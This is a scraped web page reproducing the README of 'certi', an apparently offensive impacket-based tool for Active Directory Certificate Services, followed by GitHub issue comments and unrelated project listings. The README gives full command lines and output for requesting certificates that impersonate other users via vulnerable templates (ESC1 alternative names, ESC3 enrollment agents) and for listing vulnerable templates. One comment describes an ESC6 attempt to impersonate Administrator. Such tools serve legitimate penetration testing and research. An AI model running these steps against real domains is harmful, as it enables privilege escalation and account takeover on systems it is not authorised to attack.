Utility to play with ADCS, allows to request tickets and collect information about related objects.

Last update: Dec 29, 2022

Related tags

Overview

certi

Utility to play with ADCS, allows to request tickets and collect information about related objects. Basically, it's the impacket copy of Certify. Thanks to @harmj0y and @tifkin_ for its great work with ADCS.

Request a certificate

To request a certificate you can use the req command:

$ getTGT.py 'contoso.local/Anakin:Vader1234!'ader1234!'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in Anakin.ccache
$ export KRB5CCNAME=Anakin.ccache
$ certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n
[*] Service: contoso-DC01-CA
[*] Template: User
[*] Username: Anakin

[*] Response: 0x3 Issued  0x80094004, The Enrollee (CN=Anakin,CN=Users,DC=contoso,DC=local) has no E-Mail name registered in the Active Directory.  The E-Mail name will not be included in the certificate.

[*] Cert subject: CN=Anakin,CN=Users,DC=contoso,DC=local
[*] Cert issuer: CN=contoso-DC01-CA,DC=contoso,DC=local
[*] Cert Serial: 75000000062BD9D6E3F1B15CC3000000000006
[*] Cert Extended Key Usage: Encrypting File System, Secure Email, Client Authentication

[*] Saving certificate in Anakin.pfx (password: admin)

As you may notice, you need to use Kerberos, since is the authentication method required by enrollment services. In case using other method you will get the following error:

(certi) certi$ certi.py req 'contoso.local/Anakin:[email protected]' contoso-DC01-CA
Error: WCCE SessionError: code: 0x80094011 - CERTSRV_E_ENROLL_DENIED - The permissions on this CA do not allow the current user to enroll for certificates.
Help: Try using Kerberos authentication with -k -n params

Request with an alternative name

You can use the --alt-name parameter to give an alternative subject and request a certificate that can be used to impersonate the target user if some template allows you to do that:

$ certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
[*] Service: contoso-DC01-CA
[*] Template: UserSAN
[*] Username: Anakin
[*] Alternative Name: han

[*] Response: 0x3 Issued

[*] Cert subject: CN=Anakin
[*] Cert issuer: CN=contoso-DC01-CA,DC=contoso,DC=local
[*] Cert Serial: 750000000A858CC4B4C9301ED600000000000A
[*] Cert Extended Key Usage: Encrypting File System, Secure Email, Client Authentication
[+] Cert Altname: [email protected]

[*] Saving certificate in [email protected] (password: admin)

You can get the templates vulnerable to this by using the --vuln and --enable params of the list command (be sure ):

$ certi.py list 'contoso.local/Anakin' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC1 -B 3
Name: SubCA
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC1 - SAN Impersonation, ESC2 - Any Purpose, ESC3.2 - Use Agent Certificate
--
Name: UserSAN
Schema Version: 2
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC1 - SAN Impersonation

Request as an enrollment agent

In case the available templates allows you to do that, you can request a certificate for an enrollment agent and then use it to request a certificate for another user:

$ certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --template EnrollAgent
[*] Service: contoso-DC01-CA
[*] Template: EnrollAgent
[*] Username: Han

[*] Response: 0x3 Issued

[*] Cert subject: CN=Han
[*] Cert issuer: CN=contoso-DC01-CA,DC=contoso,DC=local
[*] Cert Serial: 75000000256F1BB99993785823000000000025
[*] Cert Extended Key Usage: Certificate Request Agent

[*] Saving certificate in Han.pfx (password: admin)
$ certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --on-behalf anakin --enroll-cert Han.pfx --enroll-cert-pw admin --template EnrollWithAgent
[*] Service: contoso-DC01-CA
[*] Template: EnrollWithAgent
[*] Username: Han
[*] On behalf of: anakin

[*] Response: 0x3 Issued

[*] Cert subject: CN=anakin
[*] Cert issuer: CN=contoso-DC01-CA,DC=contoso,DC=local
[*] Cert Serial: 750000002AB527D8E1E64930DC00000000002A
[*] Cert Extended Key Usage: Any Purpose, Certificate Request Agent, Encrypting File System, Secure Email, Client Authentication

[*] Saving certificate in anakin.pfx (password: admin)

You can check for templates vulnerable to these misconfigurations with the list command (we are that permissions may restrict you from request a certificate for a given template):

$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3
Name: User
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Administrator
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Machine
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: DomainController
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: SubCA
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC1 - SAN Impersonation, ESC2 - Any Purpose, ESC3.2 - Use Agent Certificate
--
Name: EnrollAgent
Schema Version: 2
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: EnrollwithAgent
Schema Version: 2
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate

List services

$ certi.py list 'contoso.local/Han' -k -n --class service
[*] Enrollment Services

Name: contoso-DC01-CA
DNS name: dc01.contoso.local
Templates: EnrollwithAgent, EnrollAgent, UserSAN, DirectoryEmailReplication, DomainControllerAuthentication, KerberosAuthentication, EFSRecovery, EFS, DomainController, WebServer, Machine, User, SubCA, Administrator
Certificate:
  Cert Subject: CN=contoso-DC01-CA,DC=contoso,DC=local
  Cert Serial: 23D21EB948AC688545EC15FEB03B0C33
  Cert Start: 2021-08-01 12:49:46
  Cert End: 2026-08-01 12:59:46
  Cert Issuer: CN=contoso-DC01-CA,DC=contoso,DC=local

List CAs

$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --class ca
[*] Root CAs

Cert Subject: CN=contoso-DC01-CA,DC=contoso,DC=local
Cert Serial: 23D21EB948AC688545EC15FEB03B0C33
Cert Start: 2021-08-01 12:49:46
Cert End: 2026-08-01 12:59:46
Cert Issuer: CN=contoso-DC01-CA,DC=contoso,DC=local

[*] Authority Information Access

Cert Subject: CN=contoso-DC01-CA,DC=contoso,DC=local
Cert Serial: 23D21EB948AC688545EC15FEB03B0C33
Cert Start: 2021-08-01 12:49:46
Cert End: 2026-08-01 12:59:46
Cert Issuer: CN=contoso-DC01-CA,DC=contoso,DC=local

You might also like...

jfc is an utility to make reviewing ArXiv papers for your Journal Club easier.

3 Dec 20, 2021

Modest utility collection for development with AIOHTTP framework.

aiohttp-things Modest utility collection for development with AIOHTTP framework. Documentation https://aiohttp-things.readthedocs.io Installation Inst

0 Dec 11, 2022

Collection of code auto-generation utility scripts for the Horizon `Boot` system module

boot-scripts This is a collection of code auto-generation utility scripts for the Horizon Boot system module, intended for use in Atmosphère. Usage Us

4 Oct 11, 2022

Python utility for discovering interesting CFPreferences values on iDevices

Description Simple utility to search for interesting preferences in iDevices. Installation python3 -m pip install -U --user cfprefsmon Example In this

12 Aug 19, 2022

This is Cool Utility tools that you can use in python.

This is Cool Utility tools that you can use in python. There are a few tools that you might find very useful, you can use this on pretty much any project and some utils might help you a lot and save so much time since it’s a simple function.

6 Apr 18, 2022

Build capture utility for Linux

CX-BUILD Compilation Database alternative Build Prerequisite the CXBUILD uses linux system call trace utility called strace which was customized. So I

GLaDOS (G? L? Automatic Debug Operation System)

3 Nov 3, 2022

MongoDB utility to inflate the contents of small collection to a new larger collection

MongoDB Data Inflater ("data-inflater") The data-inflater tool is a MongoDB utility to automate the creation of a new large database collection using

3 Nov 28, 2021

A utility tool to create .env files

A utility tool to create .env files dump-env takes an .env.template file and some optional environmental variables to create a new .env file from thes

89 Dec 8, 2022

Yet another retry utility in Python

Yet another retry utility in Python, avereno being the Malagasy word for retry.

Haute École d'Informatique de Madagascar

4 Nov 2, 2021

Comments

LDAPS support

I m trying to connect to a Server which requires LDAPS with Signing and Channel Binding. There is no switch to activate it, ldap3 has the possibility to use it. here the debug output with Kerberos Ticket: python3 ./certi.py list 'domain.local/User' -k -n --dc-ip 10.1.2.3 Traceback (most recent call last): File "/opt/certi/./certi.py", line 5, in <module> certilib.main() File "/opt/certi/certilib/main.py", line 239, in main return main_list(args) File "/opt/certi/certilib/main.py", line 398, in main_list ldap_conn = connect_ldap( File "/opt/certi/certilib/ldap.py", line 43, in connect_ldap ldap_conn.kerberosLogin( File "/usr/local/lib/python3.9/dist-packages/impacket/ldap/ldap.py", line 276, in kerberosLogin raise LDAPSessionError( impacket.ldap.ldap.LDAPSessionError: Error in bindRequest -> strongerAuthRequired: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563

here the output with NTLM Hash: raceback (most recent call last): File "/opt/certi/./certi.py", line 5, in <module> certilib.main() File "/opt/certi/certilib/main.py", line 239, in main return main_list(args) File "/opt/certi/certilib/main.py", line 398, in main_list ldap_conn = connect_ldap( File "/opt/certi/certilib/ldap.py", line 53, in connect_ldap ldap_conn.login( File "/usr/local/lib/python3.9/dist-packages/impacket/ldap/ldap.py", line 343, in login raise LDAPSessionError( impacket.ldap.ldap.LDAPSessionError: Error in bindRequest -> strongerAuthRequired: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563

The Auth method is not the Problem.

I'm using Kali rolling Python 3.9 impacket 0.9.24 via pip3 ldap3 2.9.1 via pip3 Target is WinSrv 2019 1809 LDAPS with Channel Binding and Signing

opened by Elan0r 2
"Impersonation of [email protected] not allowed with this certificate"
Hi. I am trying to exploit scenario ESC6 using Kali only.

To be clear, the CA "adlab-SERVER2-CA" has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled and the service "certsvc" has been restarted.

This is what I do:

Request a TGT using known plaintext credentials of the low priv. account "domainuser1" which is a member of the group "domain users": python3 /usr/share/doc/python3-impacket/examples/getTGT.py 'adlab.local/domainuser1:Passw0rd!'

Update the Kerberos variable with the TGT from the previous step: export KRB5CCNAME=/root/pentest/domainuser1.ccache

Request a certificate impersonating the "Administrator" account: python3 certi.py req adlab.local/[email protected] adlab-SERVER2-CA -k --no-pass --alt-name administrator --template User -o /root/pentest/administrator.pfx

Note that step 3 works but also outputs "Impersonation of [email protected] not allowed with this certificate". This I do not understand since the only mentioned requirement for the scenario ESC6 is that the CA has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled. If I use a custom template instead of the default template "User", which is supposed to work, and grant "domainuser1" enrollment access on that template, I no longer get the message "Impersonation of [email protected] not allowed with this certificate".

Executing the command "python3 certi.py list adlab.local/[email protected] -k --no-pass --vuln --dc-ip 10.0.0.200 --enable" which lists vulnerable templates, the default template "User" is listed...

Name: User Schema Version: 1 Enroll Services: adlab-SERVER2-CA Vulnerabilities: ESC3.2 - Use Agent Certificate msPKI-Certificate-Name-Flag: (0x-5a000000) SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH msPKI-Enrollment-Flag: (0x29) INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT msPKI-RA-Signature: 0 pKIExtendedKeyUsage: Encrypting File System, Secure Email, Client Authentication SD Owner: S-1-5-21-1102219418-2391489858-980994391-519 adlab\Enterprise Admins Permissions Enrollment Permissions Enrollment Rights S-1-5-21-1102219418-2391489858-980994391-519 adlab\Enterprise Admins S-1-5-21-1102219418-2391489858-980994391-513 adlab\Domain Users S-1-5-21-1102219418-2391489858-980994391-512 adlab\Domain Admins Write Permissions Write Owner S-1-5-21-1102219418-2391489858-980994391-519 adlab\Enterprise Admins S-1-5-21-1102219418-2391489858-980994391-512 adlab\Domain Admins Write DACL S-1-5-21-1102219418-2391489858-980994391-519 adlab\Enterprise Admins S-1-5-21-1102219418-2391489858-980994391-512 adlab\Domain Admins Write Property S-1-5-21-1102219418-2391489858-980994391-519 adlab\Enterprise Admins S-1-5-21-1102219418-2391489858-980994391-513 adlab\Domain Users S-1-5-21-1102219418-2391489858-980994391-512 adlab\Domain Admins

What are the requirements on the ADCS server/the CA/the certificate template/the ACEs for requesting a certificate impersonating a different account? Do Certy only support ESC1, not ESC6?

I should also mention that using Certify from a domain-joined machine in the same environment works just fine. In other words, Certify does support ESC6.
opened by jsdhasfeds 0

Owner

Eloy

GitHub

Rabbito is a mini tool to find serialized objects in input values

Rabbito-ObjectFinder Rabbito is a mini tool to find serialized objects in input values What does Rabbito do Rabbito has the main object finding Serial

7 Dec 13, 2021

A Python package implementing various colour checker detection algorithms and related utilities.

147 Dec 29, 2022

Python Libraries with functions and constants related to electrical engineering.

ElectricPy Electrical-Engineering-for-Python Python Libraries with functions and constants related to electrical engineering. The functions and consta

39 Dec 23, 2022

A Python utility belt containing simple tools, a stdlib like feel, and extra batteries. Hashing, Caching, Timing, Progress, and more made easy!

Ubelt is a small library of robust, tested, documented, and simple functions that extend the Python standard library. It has a flat API that all behav

638 Dec 13, 2022

isort is a Python utility / library to sort imports alphabetically, and automatically separated into sections and by type.

isort is a Python utility / library to sort imports alphabetically, and automatically separated into sections and by type. It provides a command line utility, Python library and plugins for various editors to quickly sort all your imports.

5.5k Jan 8, 2023

Airspy-Utils is a small software collection to help with firmware related operations on Airspy HF+ devices.

Airspy-Utils Airspy-Utils is a small software collection to help with firmware related operations on Airspy HF+ devices on Linux (and other free syste

11 Oct 4, 2022

Utility to extract Fantasy Grounds Unity Line-of-sight and lighting files from a Univeral VTT file exported from Dungeondraft

uvtt2fgu Utility to extract Fantasy Grounds Unity Line-of-sight and lighting files from a Univeral VTT file exported from Dungeondraft This program wo

29 Dec 5, 2022